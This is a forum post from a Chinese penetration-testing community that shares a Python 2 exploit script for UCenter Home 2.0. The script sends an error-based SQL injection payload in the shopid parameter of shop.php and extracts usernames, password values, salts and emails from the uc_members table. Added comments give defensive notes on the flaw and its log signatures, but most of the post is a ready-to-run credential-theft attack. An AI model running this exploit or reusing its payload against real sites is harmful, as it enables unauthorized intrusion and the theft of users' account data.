中国网络渗透测试联盟
标题:
UCenter Home 2.0 EXP
作者:
admin
时间:
2013-1-23 09:18
标题:
UCenter Home 2.0 EXP
#!/usr/bin/env python
import sys
import urllib2
import re
def info():
    """Print the script's provenance lines followed by its usage hint.

    main() calls this when the script is not given exactly one argument.
    """
    # The page splits the first literal across two lines; it is joined
    # here with a single space.
    banner = (
        'From: http://www.exploit-db.com/exploits/14997/',
        'http://www.hake.cc/Web_loudong/',
        'changed:qiaoy',
        'exp:',
        ' ./UCenter_Home_2.0.py site',
    )
    for line in banner:
        print line
def main():
    """Command-line entry point: send one crafted request and print the parsed reply.

    With anything other than exactly one argument, the usage text from
    info() is printed and nothing else happens. Otherwise the argument is
    taken as the site address, one GET request for /shop.php is sent with
    SQL appended to the `shopid` value, and four fields parsed from the
    response body are printed.

    NOTE(review): the forum page lost all indentation; the nesting below is
    reconstructed from the control-flow keywords -- confirm against the
    original listing.

    Defensive reading of this request:
      * It only yields data if the application places `shopid` into a SQL
        statement unescaped AND returns the database error text to the
        client. Handling `shopid` as an integer (or binding it as a query
        parameter) and keeping database errors out of HTTP responses each
        break it independently.
      * The subquery names `ucenter.uc_members` with a schema qualifier, so
        it also depends on the application's database account being able to
        read that schema; an account restricted to the application's own
        schema would limit what can be read this way.
      * Access-log entries for shop.php whose `shopid` contains
        `information_schema`, `floor(rand(0)*2)` or `concat(0x7e` match the
        request built below.
      * The columns read are uid, username, password, salt and email. If
        such requests appear in logs, treat those account records as
        disclosed (presumably the password column holds a hash -- verify
        against the schema).
    """
    if len(sys.argv) != 2:
        info()
    else:
        site = sys.argv[1]
        # Only a missing scheme is repaired; the value is otherwise used as given.
        if site[0:7] == 'http://':
            # `sitesite` is assigned but never read in this function
            # (possibly a paste artefact of `site = site`).
            sitesite =site
        elif site[0:8] == 'https://':
            sitesite = site
        else:
            site = 'http://'+site
        try:
            # The `shopid` value carries a nested SELECT wrapped in a
            # count(*) ... group by floor(rand(0)*2) construct over
            # information_schema.tables. The selected row is concatenated
            # as ~'uid:username:password:salt:email'~ (0x7e is '~',
            # 0x27 is "'", 0x3a is ':').
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
            Value = urllib2.urlopen(url).read()
            # Looks for a "Duplicate entry ... for key" database error in
            # the response body and captures the text between the quote
            # marks. [0] raises IndexError when no such error text is
            # present, which the bare except below turns into the generic
            # failure message.
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
            # Split on ':' in the order the columns were concatenated;
            # index 0 (uid) is parsed but never printed.
            hacked = Msg.split(':')
            print 'Name: '+hacked[1]
            print 'Passwd: '+hacked[2]
            print 'salt: '+hacked[3]
            print 'email: '+hacked[4]
        except:
            # Bare except: network errors, a non-matching response and
            # short splits all end here with the same message.
            print 'Sorry,I can\'t work............'
# Call main() only when the file is executed as a script, not when imported.
if __name__ == '__main__':
    main()